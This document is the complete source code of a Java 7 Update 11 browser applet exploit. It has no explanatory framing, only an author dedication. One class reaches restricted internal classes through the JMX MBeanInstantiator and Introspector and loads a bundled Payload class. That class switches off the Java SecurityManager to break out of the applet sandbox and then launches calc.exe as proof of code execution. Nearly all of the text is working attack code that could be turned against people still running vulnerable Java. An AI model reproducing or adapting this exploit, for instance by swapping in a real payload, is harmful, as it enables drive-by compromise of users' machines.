Java 7u11 Exploit Source Code

/*
*   For my sistha with love (Java 1.7.0_11 Exploit)
*
*   u.u This day I´m so sad
*
*   https://twitter.com/Anonyx321
*/
import java.applet.Applet;
import com.sun.jmx.mbeanserver.Introspector;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles.Lookup;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import javax.management.ReflectionException;
import java.io.*;

public class PaunchGift extends Applet
{

  public void init()
  {

    try
    {
           int length;
           byte[] buffer = new byte[5000];
           ByteArrayOutputStream os = new ByteArrayOutputStream();

           // read in the class file from the jar
           InputStream is = getClass().getResourceAsStream("Payload.class");

           // and write it out to the byte array stream
           while( ( length = is.read( buffer ) ) > 0 )
               os.write( buffer, 0, length );

           // convert it to a simple byte array
           buffer = os.toByteArray();

          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");

          Method method = getMethod(class1, "enter", true);
          Object obj = method.invoke(null, new Object[0]);
          Method method1 = getMethod(class1, "createClassLoader", false);
          Object obj1 = method1.invoke(obj, new Object[1]);

          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
          Method method2 = getMethod(class2, "defineClass", false);

          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
          my_class.newInstance();
          Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
          m_outSandbox.invoke(null, new Object[] {});

    }
    catch (Throwable localThrowable){}

  }


   private Method getMethod(Class class1, String s, boolean flag)
  {
    try {
      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
      Method[] amethod1 = amethod;

      for (int i = 0; i < amethod1.length; i++) {
        Method method = amethod1[i];
        String s1 = method.getName();
        Class[] aclass = method.getParameterTypes();
        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
      }
    } catch (Exception localException) {  }

    return null;
  }

  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
  {
    Object obj = null;
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();

    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
  }

}

###############################################
import java.lang.reflect.Method;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class Payload implements PrivilegedExceptionAction
{

    public Payload()
    {
        try
        {
            AccessController.doPrivileged(this);
        }
        catch(Exception exception) { }
    }

    public Object run() throws Exception
    {
        Class cl = System.class;
        Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
        m.invoke(null, new Object[1]);
        return null;
    }

    public static void outSandbox() throws Exception
    {
        Runtime.getRuntime().exec("calc.exe");
    }
}